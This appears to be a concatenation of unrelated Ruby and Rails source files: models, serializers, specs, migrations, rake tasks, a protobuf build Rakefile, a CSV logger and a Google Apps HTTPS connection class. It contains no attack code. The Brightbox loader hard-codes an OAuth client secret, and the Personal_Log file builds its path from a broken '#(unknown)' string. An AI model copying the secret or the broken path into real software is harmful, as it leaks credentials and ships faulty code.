      attribute :iso_a3_country_code, String
    end

    # A single deployment window with its locations.
    class EligibilityDeployment
      include Virtus.model

      attribute :segment_identifier, String
      attribute :begin_date, Date
      attribute :end_date, Date
      attribute :project_code, String
      attribute :locations, Array[EligibilityDeploymentLocation]
    end

    # One period of military service, with its deployments and combat pay.
    class EligibilityMilitaryServiceEpisode
      include Virtus.model

      attribute :begin_date, Date
      attribute :end_date, Date
      attribute :branch_of_service_code, String
      attribute :discharge_character_of_service_code, String
      attribute :honorable_discharge_for_va_purpose_code, String
      attribute :narrative_reason_for_separation_code, String
      attribute :deployments, Array[EligibilityDeployment]
      attribute :combat_pay, Array[EMIS::Models::CombatPay]
    end

    # Top-level eligibility response aggregating the models above.
    class MilitaryServiceEligibilityInfo
      include Virtus.model

      attribute :veteran_status, Array[EMIS::Models::VeteranStatus]
      attribute :dental_indicator, Array[DentalIndicator]
      attribute :military_service_episodes, Array[EligibilityMilitaryServiceEpisode]
    end
  end
end
|
# Serializes a Role with its timestamps, polymorphic resource reference and
# associated activities, people and person groups.
class RoleSerializer < ApplicationSerializer
  object_as :role

  attributes(
    :name,
    :resource_type,
    :resource_id,
    :created_at,
    :updated_at,
  )

  has_many :activities, serializer: ActivitySerializer
  has_many :people, serializer: PersonSerializer
  has_many :person_groups, serializer: PersonGroupSerializer
end
|
#!/usr/bin/env ruby
# frozen_string_literal: true
require_relative 'board'
require_relative 'color'
# Knight
class Knight
  include Color

  def initialize
    # The eight L-shaped offsets a knight can make; order is preserved
    # because the board search visits moves in this sequence.
    @moves = [[2, 1], [2, -1], [1, 2], [-1, 2], [-2, 1], [-2, -1], [1, -2], [-1, -2]]
    @min_coordinate = 0
    @max_coordinate = 7
    @board = Board.new(self)
  end

  # Every on-board square reachable in one knight move from coordinate.
  def possible_moves_from_coordinate(coordinate)
    x, y = coordinate
    @moves
      .map { |dx, dy| [x + dx, y + dy] }
      .select { |square| valid_move?(square) }
  end

  # Finds and prints the shortest knight path between two squares.
  def knight_moves(start_coordinate, end_coordinate)
    print_shortest_path(@board.find_shortest_path(start_coordinate, end_coordinate))
  end

  private

  # A move is valid when both coordinates stay on the 8x8 board.
  def valid_move?(coordinate)
    coordinate.all? { |value| value.between?(@min_coordinate, @max_coordinate) }
  end

  # Renders the path as "[x, y] -> [x, y] -> ..." in colour.
  def print_shortest_path(path)
    arrow = color_text(' -> ', :red)
    steps = path.map { |x, y| color_text("[#{x}, #{y}]", :magenta) }
    puts steps.join(arrow)
  end
end
|
FactoryBot.define do
  # A unit with a random secondary address, attached to its own building.
  factory :unit do
    name { Faker::Address.secondary_address }
    association :building, factory: :building
  end
end
|
require 'rabbit_jobs'
require 'rake'
# Current environment name: Rails.env when Rails is loaded, otherwise the
# RAILS_ENV variable, defaulting to 'development'.
def rails_env
  return Rails.env if defined?(Rails)
  ENV.fetch('RAILS_ENV', 'development')
end
# Application root as a Pathname: RAILS_ROOT when set, then Rails.root, and
# finally the working directory. The original referenced Rails
# unconditionally and raised NameError when run outside a Rails process
# without RAILS_ROOT (its sibling rails_env already guards with defined?).
def app_root
  root = ENV['RAILS_ROOT'] || (defined?(Rails) ? Rails.root : Dir.pwd)
  Pathname.new(root)
end
# Ensures the log/, tmp/ and tmp/pids/ directories exist under the app root.
def make_dirs
  %w(log tmp tmp/pids)
    .map { |subdir| app_root.join(subdir) }
    .reject { |dir| File.directory?(dir) }
    .each { |dir| Dir.mkdir(dir) }
end
namespace :rj do
  # Loads the Rails app when available so workers see the full environment.
  task :environment do
    Rails.application.require_environment! if defined?(Rails)
  end

  desc 'Starts a Rabbit Jobs worker'
  task worker: :environment do
    # QUEUES/QUEUE: comma-separated queue names; CONSUMER: consumer class.
    queues = (ENV['QUEUES'] || ENV['QUEUE'] || '').split(',')
    make_dirs
    worker = RJ::Worker.new(*queues)
    worker.consumer = RJ::Consumer.const_get(ENV['CONSUMER'].classify).new if ENV['CONSUMER']
    worker.process_name = "rj_worker #{rails_env} [#{queues.join(',')}]"
    # worker.work blocks until shutdown; its result becomes the exit status.
    exit(worker.work)
  end

  desc 'Starts a Rabbit Jobs scheduler'
  # NOTE(review): unlike :worker, this task does not depend on :environment —
  # confirm whether that is deliberate.
  task :scheduler do
    make_dirs
    scheduler = RabbitJobs::Scheduler.new
    scheduler.process_name = "rj_scheduler #{rails_env}"
    exit(scheduler.work)
  end
end
|
class AddDoToComment < ActiveRecord::Migration
  # Adds an indexed comments.do discriminator column ("comment", or later
  # perhaps "follow") with a sensible default.
  def self.up
    add_column :comments, :do, :string, :default => "comment" # maybe follow
    add_index :comments, [:do]
  end

  # BUG FIX: remove_column requires the column name; the original
  # `remove_column :comments` raised ArgumentError on rollback. Dropping
  # the column also drops its index.
  def self.down
    remove_column :comments, :do
  end
end
|
require 'rails_helper'
# Model spec for the PurchaseAddress form object (example descriptions are
# in Japanese): valid/invalid combinations of payment token, postal code,
# prefecture, city, house number and phone number.
RSpec.describe PurchaseAddress, type: :model do
  before do
    @purchase_address = FactoryBot.build(:purchase_address)
  end

  describe '商品購入情報登録' do
    # Happy path: the factory default is valid; building name is optional
    # and a 10-digit phone number is accepted.
    context '商品購入情報登録がうまくいくとき' do
      it 'クレジットカードの情報と配送先住所の情報が正しく入力されていれば保存ができること' do
        expect(@purchase_address).to be_valid
      end
      it '配送先住所の建物名は空でも保存できること' do
        @purchase_address.building = nil
        expect(@purchase_address).to be_valid
      end
      it '電話番号が11文字以内であれば保存できること' do
        @purchase_address.tel = '0458889999'
        expect(@purchase_address).to be_valid
      end
    end

    # Failure paths: each required field produces its localized error.
    context '商品購入情報登録がうまくいかないとき' do
      it 'クレジットカードの情報が空では保存できないこと' do
        @purchase_address.token = nil
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include("クレジットカード情報を入力してください")
      end
      it '郵便番号が空では保存できないこと' do
        @purchase_address.postal_code = nil
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include("郵便番号を入力してください")
      end
      it '郵便番号が半角のハイフンを含んだ正しい形式でないと保存できないこと' do
        @purchase_address.postal_code = 1_112_222
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include('郵便番号はハイフンが必要です')
      end
      it '配送先住所の都道府県が選択されていないと保存できないこと' do
        @purchase_address.state_id = nil
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include('都道府県を入力してください')
      end
      # state_id 1 is the placeholder option in the select box.
      it '配送先住所の都道府県選択でid:1を選択していると保存できないこと' do
        @purchase_address.state_id = 1
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include('都道府県は1以外の値にしてください')
      end
      it '配送先住所の市区町村が空では保存できないこと' do
        @purchase_address.city = nil
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include("市区町村を入力してください")
      end
      it '配送先住所の番地が空では保存できないこと' do
        @purchase_address.house_number = nil
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include("番地を入力してください")
      end
      it '電話番号が空では保存できないこと' do
        @purchase_address.tel = nil
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include("電話番号を入力してください")
      end
      it '電話番号が11文字以上では保存できないこと' do
        @purchase_address.tel = '090123456789'
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include('電話番号は11文字以内の数字のみ入力できます')
      end
      it '電話番号にハイフン等の記号が含まれていると保存できないこと' do
        @purchase_address.tel = '090-1234-5678'
        @purchase_address.valid?
        expect(@purchase_address.errors.full_messages).to include('電話番号は11文字以内の数字のみ入力できます')
      end
    end
  end
end
|
class Admin < ActiveRecord::Base
  # singleton_guard is pinned to 0 so only one identifiable row can validate.
  validates_inclusion_of :singleton_guard, in: [0]

  # Returns the single Admin row, rebuilding the table contents whenever it
  # does not hold exactly one record.
  def self.instance
    # there will be only one row, and its ID must be '1'
    return Admin.all.first if Admin.all.count == 1
    Admin.destroy_all
    Admin.create(singleton_guard: 0)
  end
end
|
class Xlsx
  # Lists the .xlsx files under tmp/xlsx, skipping editor lock files ("~...").
  def self.file_names
    res = []
    path = Rails.root.join('tmp', 'xlsx')
    Dir.open(path) do |dir|
      dir.each do |f|
        next if f.match(/^~/)
        next unless f.match(/xlsx$/)
        res.push(f)
      end
    end
    res
  end

  # Fills rows 5..10 of the template workbook (tmp/xlsx/<template>) with
  # sample cells, writes the result to tmp/csv/<filename>.xlsx and returns
  # the output path.
  def self.file filename, template
    workbook = RubyXL::Parser.parse(Rails.root.join('tmp', 'xlsx', template))
    worksheet = workbook[0]
    # https://github.com/weshatheleopard/rubyXL
    # Possible weights: hairline, thin, medium, thick
    #
    # http://www.rubydoc.info/gems/rubyXL/3.3.17/RubyXL
    # %w{ none thin medium dashed dotted thick double hair
    #     mediumDashed dashDot mediumDashDot dashDotDot slantDashDot }
    5.upto(10).each do |i|
      worksheet.add_cell(i, 1, 'hoge')
      # worksheet.sheet_data[i][1].change_border(:top, 'thin')     # normal line
      # worksheet.sheet_data[i][1].change_border(:top, 'hairline') # no visible line
      # worksheet.sheet_data[i][1].change_border(:top, 'medium')   # thick line
      worksheet.sheet_data[i][1].change_border(:top, 'dotted') # dotted line
    end
    FileUtils.mkdir_p(Rails.root.join('tmp', 'csv'))
    # BUG FIX: the output name previously contained the literal text
    # "#(unknown)" — a mangled interpolation — and the filename argument
    # was never used.
    path = Rails.root.join('tmp', 'csv', "#{filename}.xlsx")
    workbook.write(path)
    path
  end
end
|
# frozen_string_literal: true
module Validators
  # Runs a configurable subset of checklist validations: each entry in
  # +fields+ names one of the private validator methods below
  # (e.g. :ticket, :title), dispatched via send.
  class Checklists < Base
    include ChecklistsValidatorHelper

    # fields: enumerable of validator names to run, in order.
    def initialize(fields)
      @fields = fields
    end

    # Stores +list+ for the helper methods and runs every configured check.
    def validate(list)
      @list = list
      fields.each { |field| send(field) }
    end

    private

    attr_reader :fields, :list

    def ticket
      validate_ticket_presence
    end

    def title
      validate_title_presence
    end
  end
end
|
class AddResultToUserSubmissions < ActiveRecord::Migration
  # Stores the generated result file directly on the submission as a blob.
  def change
    add_column :user_submissions, :result_file, :binary
  end
end
|
# Attachment plus print metadata for a single print on a job request.
# Soft-deleted via acts_as_paranoid.
class PrintDetail < ApplicationRecord
  acts_as_paranoid
  belongs_to :job_request

  include AttachmentUploader::Attachment.new(:attachment)

  # Adds the attachment and its URL to the default JSON representation.
  def as_json(*)
    previous = super
    # previous[:cached_attachment_data] = cached_attachment_data
    previous[:attachment] = attachment
    previous[:attachment_url] = attachment_url
    previous
  end

  # Options for the print-method select box.
  def self.print_methods
    ['Silkscreen',
     'Heat Transfer',
     'Crackle',
     'Crystalina (Glitter)',
     'Foil',
     'Flocking',
     'Gel',
     'Glow-In-The-Dark',
     'High Density',
     'High Gloss',
     'Metallic',
     'Pearlescent',
     'Puff',
     'Embroidery',
     'Dye Sub',
     'Full Embroidery',
     'CMYK']
  end

  # Options for the block-size select box.
  def self.block_sizes
    ['A3','A3+','A4','A5','Full','N/A','3 x 3']
  end

  # Options for the print-position select box.
  def self.print_positions
    ['Front','Back','Side Left','Side Right']
  end
end
|
# Hand-rolled persistence for departments over the raw DB[:conn] handle
# (SQLite-style prepared statements).
class Department
  attr_accessor :id, :name

  # All courses belonging to this department.
  # (The original assigned the result to an unused local before returning.)
  def courses
    Course.find_all_by_department_id(@id)
  end

  # Points the course at this department; the course object is responsible
  # for persisting the change.
  def add_course(course)
    course.department = self
  end

  def self.create_table
    create = "CREATE TABLE IF NOT EXISTS departments (id INTEGER PRIMARY KEY, name TEXT);"
    DB[:conn].execute(create)
  end

  def self.drop_table
    drop = "DROP TABLE IF EXISTS departments;"
    DB[:conn].execute(drop)
  end

  # Inserts a new row and captures the generated primary key.
  def insert
    db = DB[:conn]
    db.prepare("INSERT INTO departments (name) VALUES (?);").execute(@name)
    @id = db.last_insert_row_id()
  end

  def update
    DB[:conn].prepare("UPDATE departments SET name = ? WHERE departments.id = ?;").execute(@name, @id)
  end

  # Insert when the record has no id yet, otherwise update in place.
  def save
    @id.nil? ? insert : update
  end

  # Hydrates a Department from a [id, name] result row.
  def self.new_from_db(row)
    dept = Department.new
    dept.id = row[0]
    dept.name = row[1]
    dept
  end

  def self.find_by_name(name)
    find_first_by("name", name)
  end

  def self.find_by_id(id)
    find_first_by("id", id)
  end

  # Shared lookup extracted from the previously duplicated finders; returns
  # the first matching Department or nil. The column name is hard-coded by
  # the two callers above, so interpolating it is injection-safe.
  def self.find_first_by(column, value)
    rows = DB[:conn].prepare("SELECT * FROM departments WHERE departments.#{column} = ?").execute(value).to_a
    rows.empty? ? nil : new_from_db(rows[0])
  end
end
|
#!/usr/bin/env ruby
# Demonstrates rescue + ensure: the ZeroDivisionError is caught, and the
# ensure clause always runs, setting @flag as a visible side effect.
begin
  x = 1/0
rescue ZeroDivisionError
  puts "you cannot divide by zero"
ensure
  @flag = 1
  puts "inside ensure"
end
|
class Recipe < ActiveRecord::Base
  # A recipe is only valid when all of its core fields are filled in.
  validates :name, :ingredients, :instructions, presence: true
end
|
# Backport: define Kernel#require_relative on Rubies that lack it (< 1.9),
# resolving the path against the calling file's directory.
unless Kernel.respond_to?(:require_relative)
  module Kernel
    def require_relative(path)
      require File.join(File.dirname(caller.first), path.to_str)
    end
  end
end
# Put this lib directory (and any vendored gems) on the load path before
# requiring dependencies.
lib_dir = File.expand_path(File.dirname(__FILE__))
$LOAD_PATH.unshift lib_dir unless $LOAD_PATH.include?(lib_dir)

# Optional OS-specific overrides, loaded only when the file exists.
os_config = File.join(lib_dir, "brightbox-cli", "os_config.rb")
require os_config if File.exist? os_config

vendor_dir = File.expand_path(File.join(lib_dir, 'brightbox-cli', 'vendor'))
# Add any vendored libraries into search path
Dir.glob(vendor_dir + '/*').each do |f|
  $LOAD_PATH.unshift File.join(f, 'lib')
end

require "multi_json"
require 'date'
require 'gli'
require "i18n"
require "fog/brightbox"

# I18n stuff to clean up scattered text everywhere
I18n.enforce_available_locales = false
I18n.default_locale = :en
I18n.load_path = [File.join(File.dirname(__FILE__) + "/../locales/en.yml")]
# Top-level namespace for the Brightbox CLI. The API endpoint can be
# overridden via BRIGHTBOX_API_URL; otherwise the GB1 region is used.
module Brightbox
DEFAULT_API_ENDPOINT = ENV["BRIGHTBOX_API_URL"] || "https://api.gb1.brightbox.com"
# OAuth client credentials embedded in the CLI itself, used when the user
# has not registered their own API client.
EMBEDDED_APP_ID = "app-12345"
EMBEDDED_APP_SECRET = "mocbuipbiaa6k6c"
# Resource classes are autoloaded on first reference to keep startup fast.
autoload :Server, File.expand_path("../brightbox-cli/servers", __FILE__)
autoload :DetailedServer, File.expand_path("../brightbox-cli/detailed_server", __FILE__)
autoload :Image, File.expand_path("../brightbox-cli/images", __FILE__)
autoload :Type, File.expand_path("../brightbox-cli/types", __FILE__)
autoload :Zone, File.expand_path("../brightbox-cli/zones", __FILE__)
autoload :CloudIP, File.expand_path("../brightbox-cli/cloud_ips", __FILE__)
autoload :User, File.expand_path("../brightbox-cli/users", __FILE__)
autoload :Account, File.expand_path("../brightbox-cli/accounts", __FILE__)
autoload :CollaboratingAccount, File.expand_path("../brightbox-cli/collaborating_account", __FILE__)
autoload :LoadBalancer, File.expand_path("../brightbox-cli/load_balancers", __FILE__)
autoload :ServerGroup, File.expand_path("../brightbox-cli/server_groups", __FILE__)
autoload :DetailedServerGroup, File.expand_path("../brightbox-cli/detailed_server_group", __FILE__)
autoload :FirewallPolicy, File.expand_path("../brightbox-cli/firewall_policy", __FILE__)
autoload :FirewallRule, File.expand_path("../brightbox-cli/firewall_rule", __FILE__)
autoload :FirewallRules, File.expand_path("../brightbox-cli/firewall_rules", __FILE__)
autoload :Collaboration, File.expand_path("../brightbox-cli/collaboration", __FILE__)
autoload :UserCollaboration, File.expand_path("../brightbox-cli/user_collaboration", __FILE__)
autoload :DatabaseType, File.expand_path("../brightbox-cli/database_type", __FILE__)
autoload :DatabaseServer, File.expand_path("../brightbox-cli/database_server", __FILE__)
autoload :DatabaseSnapshot, File.expand_path("../brightbox-cli/database_snapshot", __FILE__)
module Config
autoload :SectionNameDeduplicator, File.expand_path("../brightbox-cli/config/section_name_deduplicator", __FILE__)
end
end
# NOTE(review): this path ("brightbox/cli/config") breaks the
# "brightbox-cli/..." pattern used by every other require below, and
# "brightbox-cli/config" is itself required further down — confirm this
# file really lives at brightbox/cli/config.
require_relative "brightbox/cli/config"
require_relative "brightbox-cli/connection_manager"
require_relative 'brightbox-cli/tables'
require_relative "brightbox-cli/logging"
require_relative "brightbox-cli/api"
# Configuration subsystem (mixins are loaded before the Config class itself).
require_relative "brightbox-cli/config/cache"
require_relative "brightbox-cli/config/gpg_encrypted_passwords"
require_relative "brightbox-cli/config/authentication_tokens"
require_relative "brightbox-cli/config/accounts"
require_relative "brightbox-cli/config/clients"
require_relative "brightbox-cli/config/sections"
require_relative "brightbox-cli/config/api_client"
require_relative "brightbox-cli/config/user_application"
require_relative "brightbox-cli/config/to_fog"
require_relative "brightbox-cli/config/dirty"
require_relative "brightbox-cli/config"
require_relative "brightbox-cli/version"
require_relative "brightbox-cli/ruby_core_ext"
require_relative "brightbox-cli/nilable_hash"
require_relative "brightbox-cli/error_parser"
require_relative "brightbox-cli/gli_global_hooks"
|
require 'open-uri'
require 'fileutils'
# Working directories/filenames for the protobuf -> Swift build pipeline.
PROTOBUF_DEPS_DIR="./.protobuf"
PROTOBUF_OUT_DIR="./Sources/Tenderswift/TendermintTypes"
TENDERMINT_PROTOBUF="TendermintTypes.proto"
task default: :build_protobuf
desc "Download and properly extracts required protobuf dependency definitions"
task :get_protobuf_deps do
FileUtils.mkdir_p(PROTOBUF_DEPS_DIR)
# gogo/protobuf supplies the gogoproto extensions plus the well-known types.
get_protobuf_dependency("gogo/protobuf",
version: "v1.2.1",
dest_dir: PROTOBUF_DEPS_DIR,
include_paths: {
"gogoproto" => "github.com/gogo/protobuf/gogoproto",
"protobuf/google/protobuf" => "google/protobuf"
}
)
# NOTE(review): tracking "master" is not reproducible — consider pinning a tag.
get_protobuf_dependency("tendermint/tendermint",
version: "master",
dest_dir: PROTOBUF_DEPS_DIR,
include_paths: {
"crypto/merkle" => "github.com/tendermint/tendermint/crypto/merkle",
"libs/common" => "github.com/tendermint/tendermint/libs/common",
"abci/types" => ""
}
)
# The ABCI types.proto is renamed so the generated Swift type gets our name.
sh "mv #{File.join(PROTOBUF_DEPS_DIR, 'types.proto')} #{File.join(PROTOBUF_DEPS_DIR, TENDERMINT_PROTOBUF)}"
end
task :clean_protobuf_deps do
FileUtils.rm_rf(PROTOBUF_DEPS_DIR)
end
task :install_swift_protobuf do
# TODO Add support for Linux
sh "brew install swift-protobuf"
end
desc "Builds Tendermint ABCI types from protobuf definitions"
task build_protobuf: [:get_protobuf_deps] do
build_all_protobuf
generate_xcode_project
end
#
# Local utility functions
#
# Regenerate the Xcode project so newly generated Swift sources are picked up.
def generate_xcode_project
sh "swift package generate-xcodeproj"
end
# Compile every .proto under PROTOBUF_DEPS_DIR into Swift sources.
# FIX: each include directory now gets its own -I= flag; previously the first
# glob result was appended without a flag ("-I=<deps> <dir1> -I=<dir2> ...")
# and reached protoc as a bogus positional argument.
def build_all_protobuf
  FileUtils.mkdir_p(PROTOBUF_OUT_DIR)
  include_flags = (["-I=#{PROTOBUF_DEPS_DIR}"] +
                   Dir.glob("#{PROTOBUF_DEPS_DIR}/**/*/").map { |dir| "-I=#{dir}" }).join(" ")
  Dir.glob("#{PROTOBUF_DEPS_DIR}/**/*.proto").each do |file|
    sh "protoc #{include_flags} --swift_out=#{PROTOBUF_OUT_DIR} #{file}"
  end
end
# Downloads `repo` at `version`, then copies the .proto files found under each
# `include_paths` key (a path inside the repo) to dest_dir/<import path>, so
# protoc can resolve the canonical import statements.
def get_protobuf_dependency(repo, version:, dest_dir:"./", include_paths:{})
local_file_path = download_repository(repo, version: version, dest_dir: dest_dir)
extraction_dir = extract_archive(local_file_path, dest_dir)
include_paths.each do |path, import_path|
dep_import_dir = File.join(dest_dir, import_path)
FileUtils.mkdir_p(dep_import_dir)
# Shell cp (not FileUtils.cp) so the *.proto glob is expanded by the shell.
sh "cp #{File.join(extraction_dir, path, '*.proto')} #{dep_import_dir}"
end
# Clean up both the extracted tree and the downloaded tarball.
FileUtils.rm_rf(extraction_dir)
FileUtils.rm_rf(local_file_path)
end
# Downloads the GitHub tarball for `repo` at `version` into dest_dir and
# returns the local file path.
# FIX: Kernel#open on a URL string (deprecated in 2.7, removed in Ruby 3)
# replaced with URI.open, and the tarball is written in binary mode so the
# gzip bytes are not mangled on platforms with text-mode IO.
def download_repository(repo, version:, dest_dir:"./")
  file_name_suffix = "#{version}.tar.gz"
  file_name = "#{repo.gsub('/', '_')}_#{file_name_suffix}"
  local_file_path = File.join(dest_dir, file_name)
  archive_url = "https://github.com/#{repo}/archive/#{file_name_suffix}"
  puts "Downloading '#{archive_url}' to '#{local_file_path}' ..."
  URI.open(archive_url, "rb") do |remote|
    File.binwrite(local_file_path, remote.read)
  end
  local_file_path
end
# Unpacks a .tar.gz into dest_dir/<archive name without suffix>, stripping the
# tarball's single top-level directory, and returns the extraction directory.
# FIX: use File.basename's suffix argument instead of gsub, which would also
# have removed a ".tar.gz" occurring in the middle of the file name.
def extract_archive(archive_file_path, dest_dir)
  extract_dir = File.basename(archive_file_path, ".tar.gz")
  extraction_path = File.join(dest_dir, extract_dir)
  FileUtils.mkdir_p(extraction_path)
  sh "tar -C #{extraction_path} --strip-components=1 -xvzf #{archive_file_path}"
  extraction_path
end
|
# Phylum ("filo") taxonomy model; pt-BR domain naming and messages kept as-is.
class Filo < ActiveRecord::Base
has_many :clases
has_many :exemplares
# Rails 3-style mass-assignment whitelist.
attr_accessible :descricao, :status
# will_paginate-style page size.
self.per_page = 10
# NOTE(review): the bare `joins(...)` scope body (no lambda) is the
# pre-Rails-4 form; Rails 4+ requires `scope :busca, -> { ... }` —
# confirm the target Rails version.
scope :busca, joins(:clases).order("filos.descricao")
validates_presence_of :descricao, :message =>" - Deve ser preenchido"
validates_uniqueness_of :descricao, :message =>" - Já existente"
end
|
require 'csv'
# CSV-backed record store. Records are positional arrays (one per CSV row);
# the `position` arguments throughout are column indexes into a row.
# NOTE(review): the non-CamelCase class name (Personal_Log) and camelCase
# method names are kept because callers reference them as-is.
class Personal_Log
  # Opens (or creates) the backing CSV file under Rails.root/lib and loads
  # its contents into memory.
  def initialize(filename)
    # NOTE(review): this path looks truncated/misgenerated — confirm how
    # `filename` was meant to be interpolated here.
    @filename = "#{Rails.root}/lib/#(unknown)"
    if file_dir_or_symlink_exists?(@filename)
      readFile
    else
      # Create an empty file so readFile has something to parse.
      File.new(@filename, "w").close
      readFile
    end
  end

  private

  # Persist the in-memory rows back to the CSV file (full rewrite).
  def writeFile
    CSV.open(@filename, "w") do |csv|
      @fileContent.each { |row| csv << row }
    end
  end

  # (Re)load the CSV file into @fileContent as an array of row arrays.
  def readFile
    @fileContent = CSV.read(@filename)
  end

  public

  # Returns the first row whose column `position` matches `searchTerm`, or
  # nil when nothing matches.
  # NOTE(review): searchTerm is interpolated into a Regexp, so regex
  # metacharacters in the term are interpreted — confirm that is intended.
  def findRecord(position, searchTerm)
    @fileContent.find { |row| row[position] =~ /#{searchTerm}/ }
  end

  private

  # Placeholder — not implemented yet.
  def findAllRecords
  end

  public

  # Replaces column `position` of the first matching row with `newText` and
  # writes the file back.
  # FIX: previously raised NoMethodError on nil when no row matched; now
  # returns nil in that case without touching the file.
  def updateRecord(position, searchTerm, newText)
    row = @fileContent.find { |r| r[position] =~ /#{searchTerm}/ }
    return nil if row.nil?
    row[position] = newText
    writeFile
  end

  # Appends a contact row to the CSV file.
  def newRecord(email, town, firstname, lastname, mobile)
    appendRow([email, town, firstname, lastname, mobile])
  end

  # Appends a search-history row to the CSV file.
  def recordSearch(email, name_search, category_id, date)
    appendRow([email, name_search, category_id, date])
  end

  # Appends an arbitrary pre-built row to the CSV file.
  def newLogRecord(arr)
    appendRow(arr)
  end

  public

  # Removes the first row whose column `position` matches `searchTerm`, then
  # rewrites the file. FIX: now a clean no-op (plus rewrite) when no row
  # matches instead of calling delete(nil).
  def deleteRecord(position, searchTerm)
    readFile
    row = @fileContent.find { |r| r[position] =~ /#{searchTerm}/ }
    @fileContent.delete(row) unless row.nil?
    writeFile
  end

  public

  # Removes the row at index `pos` and rewrites the file.
  def deleteRecordByIndex(pos)
    readFile
    @fileContent.delete_at(pos)
    writeFile
  end

  private

  # True when the path exists as a file/directory or as a (possibly
  # dangling) symlink.
  def file_dir_or_symlink_exists?(path_to_file)
    File.exist?(path_to_file) || File.symlink?(path_to_file)
  end

  # Shared append helper used by the public record writers.
  def appendRow(row)
    CSV.open(@filename, "a+") do |csv|
      csv << row
    end
  end
end
#p = EmployeeLogger.new("text2.txt")
#t = p.findRecord(0, 'jon@email.com')
#p.updateRecord(1, "Legend", "Cool")
#p.deleteRecord(2,"Johnny")
#p.newRecord("jon@email.com", "Naas", "Johnny", "McCarthy", "0834342009")
#p.deleteRecordByIndex(3) |
module EmailHelper
  include Rails.application.routes.url_helpers
  include ActionView::Helpers::UrlHelper

  # Renders an anchor tag pointing at the user's Zhishi profile page, using
  # the user's display name as the link text.
  # FIX: the environment key had a typo (ZHISHi_URL) and the link_to
  # arguments were swapped — link_to expects (link text, url), but the URL
  # was being passed as the text and the name as the href.
  def user_url user
    link_to user.zhishi_name, "#{ENV['ZHISHI_URL']}/users/#{user.zhishi_id}"
  end
end
|
# Serializes a task tag for the manager UI; the tag's name is exposed
# under the `text` key.
class Manager::TaskTagSerializer < ActiveModel::Serializer
attributes :id, :text, :taggings_count
# `text` aliases the underlying tag's name.
def text
object.name
end
end
|
# ASCII rendering of a 4x4 board: a lettered column header plus four
# numbered rows.
class GameDisplay
attr_reader :rows,
:display_positions
def initialize
@header = '.A B C D'
@rows = ['1 ',\
'2 ',\
'3 ',\
'4 ']
# Appears to map board coordinates (e.g. :b3) to [row index, character
# column] within @rows so marks can be written in place — columns step by
# 2 (1, 3, 5, 7) to leave spacing between cells; confirm against callers.
@display_positions = {a1:[0, 1], b1:[0, 3], c1:[0, 5], d1:[0, 7],\
a2:[1, 1], b2:[1, 3], c2:[1, 5], d2:[1, 7],\
a3:[2, 1], b3:[2, 3], c3:[2, 5], d3:[2, 7],\
a4:[3, 1], b4:[3, 3], c4:[3, 5], d4:[3, 7]}
end
# Print the header and all four rows to stdout.
def print_to_screen
puts @header
puts @rows[0]
puts @rows[1]
puts @rows[2]
puts @rows[3]
end
end
|
# Academic group: belongs to a speciality and owns students and examinations,
# with active/inactive convenience associations for both.
class Group < ActiveRecord::Base
  belongs_to :speciality

  has_many :students
  has_many :examinations
  has_many :active_examinations, -> { where active: true }, class_name: 'Examination'
  has_many :inactive_examinations, -> { where active: false }, class_name: 'Examination'
  has_many :active_students, -> { where active: true }, class_name: 'Student'
  has_many :inactive_students, -> { where active: false }, class_name: 'Student'

  # Title, year and speciality are all mandatory.
  validates :title, :year, :speciality_id, presence: true

  # Highest-priority groups come first everywhere by default.
  default_scope { order('priority DESC') }
  scope :all_active, -> { where(active: true) }
end
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
require 'net/https'
require 'cgi'
module GAppsProvisioning #:nodoc:
  # Thin wrapper around Net::HTTP that maintains a certificate-verified SSL
  # connection to a Google Apps provisioning host.
  class Connection
    attr_reader :http_connection

    # Establishes SSL connection to Google host, optionally through an
    # authenticating HTTP proxy. Peer certificates are verified against the
    # system's default CA store.
    def initialize(host, port, proxy=nil, proxy_port=nil, proxy_user=nil, proxy_passwd=nil)
      conn = Net::HTTP.new(host, port, proxy, proxy_port, proxy_user, proxy_passwd)
      conn.use_ssl = true
      #conn.enable_post_connection_check= true
      conn.verify_mode = OpenSSL::SSL::VERIFY_PEER
      #conn.verify_mode = OpenSSL::SSL::VERIFY_NONE
      # uncomment the previous line at your own risk : the certificate won't be verified !
      store = OpenSSL::X509::Store.new
      store.set_default_paths
      conn.cert_store = store
      conn.start
      @http_connection = conn
    end

    # Performs the http request and returns the http response.
    # FIX: `header` defaults to nil but was indexed unconditionally, raising
    # NoMethodError on header-less calls; and Content-length used
    # String#length (characters) instead of #bytesize (bytes), which is
    # wrong for multibyte request bodies.
    def perform(method, path, body=nil, header=nil)
      req = Net::HTTPGenericRequest.new(method, !body.nil?, true, path)
      if header
        req['Content-Type'] = header['Content-Type'] if header['Content-Type']
        req['Authorization'] = header['Authorization'] if header['Authorization']
      end
      req['Content-length'] = body.bytesize.to_s if body
      @http_connection.request(req, body)
    end
  end
end
# Standard scaffold CRUD for admin login sessions (username, start/end
# timestamps, source IP). All actions require an authenticated admin.
class AdminsessionsController < ApplicationController
before_action :set_adminsession, only: [:show, :edit, :update, :destroy]
before_action :authenticate_admin!
# GET /adminsessions
# GET /adminsessions.json
def index
@adminsessions = Adminsession.all
end
# GET /adminsessions/1
# GET /adminsessions/1.json
def show
end
# GET /adminsessions/new
def new
@adminsession = Adminsession.new
end
# GET /adminsessions/1/edit
def edit
end
# POST /adminsessions
# POST /adminsessions.json
def create
@adminsession = Adminsession.new(adminsession_params)
respond_to do |format|
if @adminsession.save
format.html { redirect_to @adminsession, notice: 'Adminsession was successfully created.' }
format.json { render :show, status: :created, location: @adminsession }
else
format.html { render :new }
format.json { render json: @adminsession.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /adminsessions/1
